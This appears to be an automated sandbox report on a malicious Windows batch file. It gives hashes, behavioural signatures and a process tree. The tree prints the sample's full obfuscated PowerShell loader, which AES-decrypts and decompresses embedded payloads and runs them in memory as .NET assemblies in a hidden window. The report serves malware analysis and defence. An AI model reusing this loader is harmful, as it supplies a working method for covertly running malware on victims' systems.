e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
25-07-2024 06:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat
Size

232KB
MD5

7ebd033260b1e54dff5afd7c6534cf33
SHA1

cfb7040938237156fa3795755c77eecd7957bc39
SHA256

e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e
SHA512

18175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f
SSDEEP

6144:FAWrhrgGAavaCnw8PaaEnyLzdyWEklez+3PDUi4WQZ5q:KWr5Mt+wezdTeK3LUi1QZM

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1332	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1332	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1528 wrote to memory of 2668	1528	cmd.exe	31
PID 1528 wrote to memory of 2668	1528	cmd.exe	31
PID 1528 wrote to memory of 2668	1528	cmd.exe	31
PID 2668 wrote to memory of 2132	2668	cmd.exe	33
PID 2668 wrote to memory of 2132	2668	cmd.exe	33
PID 2668 wrote to memory of 2132	2668	cmd.exe	33
PID 2668 wrote to memory of 1332	2668	cmd.exe	34
PID 2668 wrote to memory of 1332	2668	cmd.exe	34
PID 2668 wrote to memory of 1332	2668	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e.bat';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "
    3⤵
    PID:2132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1332

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1332-4-0x000007FEF57EE000-0x000007FEF57EF000-memory.dmp

Filesize
4KB

Download
memory/1332-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/1332-6-0x0000000001F90000-0x0000000001F98000-memory.dmp

Filesize
32KB

Download
memory/1332-8-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

Filesize
9.6MB

Download
memory/1332-7-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

Filesize
9.6MB

Download
memory/1332-9-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

Filesize
9.6MB

Download
memory/1332-10-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

Filesize
9.6MB

Download
memory/1332-11-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

Filesize
9.6MB

Download
memory/1332-12-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp

Filesize
9.6MB

Download